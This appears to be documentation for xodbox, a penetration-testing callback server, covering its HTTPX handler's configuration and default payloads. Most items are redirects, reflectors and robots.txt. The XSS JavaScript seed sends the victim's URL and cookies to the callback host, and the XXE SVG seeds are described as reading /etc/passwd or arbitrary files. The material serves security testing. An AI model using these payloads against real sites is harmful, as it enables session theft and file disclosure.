HTTPX

HTTPX Handler

Purpose

Speak HTTP to other computers you may or may not control…

Configuration

Key           Value
handler       Must be HTTPX
listener      Default :80
static_dir    Directory to host static files from
payload_dir   Directory to import payloads from

WIP configs that are not fully implemented

Key                  Value
tls_domains          Comma-separated list of domains
acme_staging         Boolean. Shortcut to use https://acme-staging-v02.api.letsencrypt.org/directory
acme_directory_url   Override URL
autocert_accept_tos  Boolean. Do you accept the CA's TOS?

Additional Information

Things are still being created, documented, and fine-tuned.

New Features

  • Let’s Encrypt Auto Cert
  • Exfil data saver

Legacy Functionality to be implemented.

  • robots.txt
  • unfurly
  • arbitrary json
    • b64
  • redirect
    • b64
  • basic auth
  • breakfastbot
  • allow origin *

Legacy functionality that isn't specific to a handler

  • alert pattern with payload
  • alert pattern (alert patterns are part of notifiers, maybe we need to expose alert patterns based on handler type)
  • slack hook (this is now a notifier)

1 - Default Payload Seeds

seed data

Default payloads that come with xodbox.

1.1 - Default Header

Adds the default header to all HTTP responses.

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

Server: BreakfastBot/1.0.0

1.2 - Redirect

HTTP Redirects

Redirects to the URL given in the query parameter l, using the query parameter s as the HTTP status code.

What       Description                GET Parameter
Location   Location to redirect to    l
Status     HTTP status code           s

Example Request

curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"

Example Response

Location: https://github.com/defektive/xodbox

1.3 - Robots TXT

A restrictive robots.txt

Simple robots.txt to prevent indexing by well-behaved crawlers.

Example Request

curl http://xodbox.test/robots.txt

Example Response

User-Agent: *
Disallow: /

1.4 - Inspect

Reflect back HTTP requests in various formats

Depends on internal code.

/inspect

Inspect or reflect the request back in various formats.

  • Plain Text (default, .txt)
  • HTML (.html)
  • GIF (.gif)
  • JPEG (.jpg)
  • PNG (.png)
  • MP4 (.mp4)
  • XML (.xml)
  • JSON (.json)
  • JavaScript (.js)

Examples

  • http://localhost/inspect
  • http://localhost/some/random/path/inspect.gif

1.5 - XSS HTML

Returns HTML that embeds xss-js

/jsc.html

Simple HTML to load simple JS Payload.

1.6 - XSS JavaScript

Returns JS that embeds an image back to xodbox

/jsc

Simple JS payload. Useful for embedding, or for quickly copying and modifying into an XSS payload to prove execution and exfiltration.

(function (){
    var s = document.createElement("img");
    document.body.appendChild(s);
    s.src="//{{ .Host }}/jscb?src="+window.location+"&c="+document.cookie;
})()

1.7 - Default Favicon

Redirects to the default logo.

Redirects to the embedded default logo, exposed via embedded fs.

Example Request

curl -i http://xodbox.test/favicon.ico

1.8 - HTML Iframe

HTML page with iframe and image callback

/ht

Iframe callback

1.9 - Open Graph

Embed request params in open graph elements.

Useful for unfurlers. Maybe we should merge this into inspect…

Example Request

curl -i "http://xodbox.test/unfurl"

Example Response

Location: https://github.com/defektive/xodbox

1.10 - XXE Callback

More XXE

XXE Callback used by xxe-system

1.11 - XXE DTD

More XXE

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

/evil.dtd

dtd for use by others

1.12 - XXE SVG Hostname

Returns an SVG payload with XXE to get files

/sh

Attempts to read /etc/hostname.

SVG with XXE payloads

1.13 - XXE SVG Passwd

Returns an SVG payload with XXE to get files

/sp

Attempts to read /etc/passwd.

1.14 - XXE SVG Request Params

Returns an SVG payload with XXE to get files

/sv

Attempts to read whatever file is supplied via the f query parameter.

1.15 - XXE System

More XXE

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

1.16 - Default Page

Returns a simple page if nothing is matched.

Returns a simple page when no other payload pattern matches the request.

Example Request

curl -i http://xodbox.test/

Example Response

hi

1.17 - In Development Seeds

These seeds are not ready for production and may never be.

Seeds that are not tested or finished.

1.17.1 - WPAD

Returns a WPAD config file (JavaScript).

WPAD proxy. Not really useful at the moment; it should become more useful in the future.

2 - Example Payloads

Examples

Default payloads that come with xodbox.

2.1 - List Payloads

List payloads

List Payloads

---
title: List Payloads
description: List payloads
weight: 1
pattern: /i-forgot-how-things-work$
is_final: true
data:
  headers:
    Content-Type: text/plain
  body: |
    Payloads
    
    {{ range .Payloads }}
    {{ .Pattern }} - {{ .Name }} [{{ .Type }}]
    {{ .Description }}
    
    {{ end }}    
---
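The seed above is a pattern plus a templated body. The following Go program is an added example, not xodbox's own code: it renders that body with Go's text/template over a constructed payload list and checks which request paths the seed's pattern selects. It assumes the pattern is a Go regular expression matched against the request path (the trailing $ anchors the end only) and that the payload fields are named as the template references them.

```go
package main

import (
	"bytes"
	"fmt"
	"regexp"
	"text/template"
)

// Payload carries the fields the seed body references (.Pattern, .Name,
// .Type, .Description). Field names are assumed from the template.
type Payload struct {
	Pattern, Name, Type, Description string
}

// bodyTemplate is the body from the List Payloads seed above.
const bodyTemplate = `Payloads

{{ range .Payloads }}
{{ .Pattern }} - {{ .Name }} [{{ .Type }}]
{{ .Description }}

{{ end }}`

// seedPattern is the seed's pattern, assumed to be a Go regexp applied to
// the request path; $ anchors the end, but there is no ^, so prefixes match.
var seedPattern = regexp.MustCompile(`/i-forgot-how-things-work$`)

// Matches reports whether a request path would select this seed.
func Matches(path string) bool { return seedPattern.MatchString(path) }

// Render expands the seed body for a list of payloads.
func Render(payloads []Payload) (string, error) {
	tmpl, err := template.New("body").Parse(bodyTemplate)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	err = tmpl.Execute(&buf, map[string]any{"Payloads": payloads})
	return buf.String(), err
}

func main() {
	// Constructed sample list, not the real seed set shipped with xodbox.
	sample := []Payload{
		{"/robots.txt$", "Robots TXT", "HTTPX", "A restrictive robots.txt"},
		{"/redir", "Redirect", "HTTPX", "HTTP Redirects"},
	}
	out, err := Render(sample)
	fmt.Print(out, err, "\n", Matches("/i-forgot-how-things-work"), Matches("/i-forgot-how-things-work/x"))
}
```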